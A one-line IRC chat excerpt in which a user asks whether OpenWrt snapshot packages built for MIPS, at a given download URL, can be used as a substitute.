[23:57] <yodaz> can I use packages from http://downloads.openwrt.org/snapshots/packages-mips/packages/ instead ?
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